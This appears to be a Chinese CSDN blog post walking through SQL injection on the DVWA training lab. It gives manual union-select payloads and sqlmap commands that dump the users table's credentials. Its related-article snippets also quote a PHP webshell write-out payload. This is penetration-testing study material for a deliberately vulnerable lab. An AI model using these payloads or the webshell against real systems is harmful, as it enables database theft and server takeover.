SQL 注入 DVWA 实验

已于 2023-09-03 11:55:44 修改
阅读量2k 收藏 36
点赞数 1
分类专栏: 渗透测试学习 文章标签: sql 数据库 服务器
于 2023-04-10 16:02:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63645854/article/details/130062376
版权

实验环境:

实验角色

操作系统

IP 地址

备注

攻击机

Kali Linux

192.168.221.128

靶机

Windows Server 2003

192.168.221.130

实验需求:

分别通过手工注入和 SQLMAP 自动化注入的方法来完成 DVWA 靶场中的 Low,Medium,High 级别的注入测试

实验步骤:
  1. 手工注入来完成 DVWA 靶场中的 Low,Medium,High 级别的注入测试
  1. Low 级别

 寻找 SQL 注入点

文本框输入1'测试,为 GET 型

确认注入点的类型

在文本框输入1' and 1=1#,能够正常访问数据

在文本框输入1' and 1=2#,不能正常访问数据,注入点为字符型

猜解当前页面查询的字段总数

在文本框输入1' and 1=1 order by 2#,未报错

在文本框输入1' and 1=1 order by 3#,报错,字段总数为2

询当前页面中显示了哪些字段

在文本框输入1' and 1=2 union select 1,2#

查询当前网站数据库的名称

在文本框输入 1' and 1=2 union select 1,database()#

查询当前数据库中所有表的名称

在文本框输入 1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

查询指定表中所有字段名称

在文本框输入 1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

查询后台管理员用户名和密码

在文本框输入 1' and 1=2 union select user,password from users#

  1. Medium 级别

寻找注入点

确认注入点为post型

确认注入点是数字型

猜解当前页面查询的字段总数

查询当前页面中显示了哪些字段

查询当前网站数据库的名称

查询当前数据库中所有表的名称

查询指定表中所有字段名称

查询后台管理员用户名和密码

  1. High 级别

分离了输入页面和显示页面,防止 SQL MAP 进行自动化注入,且该页面参数提交方式为POST型

确认注入点的类型

在文本框输入1' and 1=1#,能够正常访问数据

在文本框输入1' and 1=2#,不能正常访问数据,注入点为字符型

猜解当前页面查询的字段总数

在文本框输入1' and 1=1 order by 2#,未报错

在文本框输入1' and 1=1 order by 3#,报错,字段总数为2

询当前页面中显示了哪些字段

在文本框输入1' and 1=2 union select 1,2#

查询当前网站数据库的名称

在文本框输入 1' and 1=2 union select 1,database()#

查询当前数据库中所有表的名称

在文本框输入 1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

查询指定表中所有字段名称

在文本框输入 1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

查询后台管理员用户名和密码

在文本框输入 1' and 1=2 union select user,password from users#

  1. SQL MAP自动化注入来完成 DVWA 靶场中的 Low,Medium,High 级别的注入测试
  1. Low 级别

查询当前网站数据库的名称

sqlmap -u "http://192.168.221.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs --cookie 'security=low; PHPSESSID=kti0j0b5qmjtk4bh3ipng5jn43' --dbs

查询当前数据库中所有表的名称

sqlmap -u "http://192.168.221.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs --cookie 'security=low; PHPSESSID=kti0j0b5qmjtk4bh3ipng5jn43' --dbs -D dvwa --tables

查询当前表的所有字段

 sqlmap -u "http://192.168.221.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs --cookie 'security=low; PHPSESSID=kti0j0b5qmjtk4bh3ipng5jn43' --dbs -D dvwa -T users --columns

查询所有后台管理员的用户名和密码

sqlmap -u "http://192.168.221.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs --cookie 'security=low; PHPSESSID=kti0j0b5qmjtk4bh3ipng5jn43' --dbs -D dvwa -T users -C user,password --dump

  1. Medium 级别

查询当前网站中所有数据库的名称

sqlmap -r /root/sql.txt --dbs

查询当前数据库中所有管理员的用户名和密码

sqlmap -r /root/sql.txt -T users -C user,password --dump

永恒之蓝1489
关注
  • 1
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql手工注入实战
mulincong的博客
05-30 2260
sql手工注入封神台靶场
sqlmap的常用命令和对dvwa的初,中级sql注入测试
G17653692793的博客
05-03 1291
sqlmap -u "[目标注入点]" --data "[request]" --cookie="[站点cookie]" -D dvwa -Tusers -C user,password --dump。sqlmap -u "[目标注入点]" --cookie="[站点cookie]" -D dvwa -T users -C user,password --dump。sqlmap -u "[目标注入点]" --cookie="[站点cookie]" -D dvwa -T users --dump。
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 1168
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWA通过攻略之SQL注入
勿山几已
05-24 8551
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
SQL注入实验
2301_76346422的博客
04-17 1161
所谓sql注入,就是通过把sql命令插入到web表单提交或输出域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的sql命令,从而进一步得到相应的数据信息通过构造一条精巧的雨具,来查询到想要得到的信息。
网络渗透测试实验3:SQL注入DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1852
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1215
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 表示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格表示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
网络安全——SQL注入实验
网络工程
12-12 2400
1、掌握SQL注入的原理。2、通过开源网站渗透平台DVWA实战,掌握常见的SQL注入方法。3、具体内容:1)学习配置开源网站渗透平台DVWA(Damn Vulnerable Web Application)。2)学习常见的SQL语句:create、select、drop、union等。3)学习相关SQL注入方法并在实验平台验证。
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
软件安全实验2 SQL注入实验
最新发布
06-19
DVWA目前的版本共有十个漏洞模块,分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的...
本科生教学SQL注入教案PPT
11-17
本教程针对本科生,旨在深入理解SQL注入的原理、识别、操作、防范方法,并结合DVWA(Damn Vulnerable Web Application)和SQLi-labs实验进行实践。 ### SQL注入的原理 SQL注入攻击的核心在于利用应用程序对用户...
2021xx0326 袁卓霞 SQL注入实验报告.docx
10-22
SQL注入实验报告 一、实验综述 本实验报告的目的是掌握 SQL 注入攻击过程、web 服务的工作机制和 SQL 注入攻击的防范措施。通过本实验,我们可以了解 SQL 注入漏洞的原理和防范方法,并掌握 Web 服务的工作机制。 ...
dvwa安全测试手册.pdf
05-25
本文档介绍目前较流行的小型WEB 安全测试程序DVWA 的相关漏洞测试过程与漏洞程序的代码审计。 查阅本文档需要掌握一定代码基础
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 1182
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
Kali linux在DVWA靶场的SQL注入
qq_74298120的博客
06-20 1743
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
dvwa-low使用sqlmap爆破
guetstudents的博客
11-23 67
通过sqlmap确认输入的链接存在基于布尔类型的盲注、基于错误的注入、时间注入攻击-时间盲注、union注入攻击。准备好自已的dvwa环境和检查一下kali上的sqlmap是否可用,有时候sqlmap会出现版本过旧的问题。4.-D 数据库名 -T 表名 -C "字段,字段" --dump 获取表字段对应的数据。3.-D 数据库名 -T 表名 --columns 获取表中所有字段。显示需要我们进行登录,我们可以获取网站的cookie,F12打开。2.-D 数据库名 --tables 获取库中所有表。
DVWA——使用sqlmap工具post注入
@一只躺平的猪@的博客
07-09 4151
使用phpstudy搭建的DVWA靶场-暴力破解(low级别) sqlmap 可以看到密码解密为root 也可以用在线的md5对密文进行解密 https://www.cmd5.com/ 本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。
Web安全实验课-4(sql 注入)
ailx10
11-22 241
有一只羊,自己洗好了澡,自己脱好了毛,最后撒上香料,走到狼的面前,祈求狼不要吃她。狼吃完了羊以后,把骨头扔给了狗,狗还舍不得吃,舔的津津有味。那只羊到死都觉得,狗都不配舔她的骨头。sql注入获取webshell寻找sql注入页面,操作数据库的地方向网站写入sql语句' union select 1,2, '<?php system($_GET["cmd"]);?>' into outf...
DVWA-SQL注入
WY92139010的博客
05-03 949
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
安装并配置SQL注入实验平台DVWA,输入任意SQL注入语句测试
05-18
首先,你需要下载DVWA并安装它。可以通过访问以下链接来下载DVWA:https://github.com/ethicalhack3r/DVWA。 安装过程可能因平台而异,但通常涉及将文件夹解压缩到您的Web服务器的根目录(例如/var/www/html/)。 安装完成后,您需要配置DVWA。为此,请复制config/config.inc.php.dist文件并将其重命名为config.inc.php。然后在config.inc.php中编辑以下行: ``` $_DVWA[ 'db_user' ] = 'your_database_username'; $_DVWA[ 'db_password' ] = 'your_database_password'; $_DVWA[ 'db_database' ] = 'your_database_name'; ``` 将“your_database_username”替换为您的数据库用户名,将“your_database_password”替换为您的数据库密码,将“your_database_name”替换为您的数据库名称。 完成配置后,您可以通过访问您的Web服务器上的DVWA文件夹来访问DVWA。 接下来,您可以使用任意SQL注入语句测试DVWA。例如,您可以通过以下方式尝试注入: 1. 在DVWA登录页面上,输入用户名“admin”和密码“password”。 2. 在“ID”字段中输入以下内容: ``` 1' OR '1'='1 ``` 3. 单击“登录”按钮。 此注入应使您成功登录,因为注入条件始终为真。您可以在登录后尝试其他注入语句,以便进一步测试DVWA的安全性。但请注意,您应该只在您自己的测试环境中进行此类测试,而不是在未经授权的系统上进行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值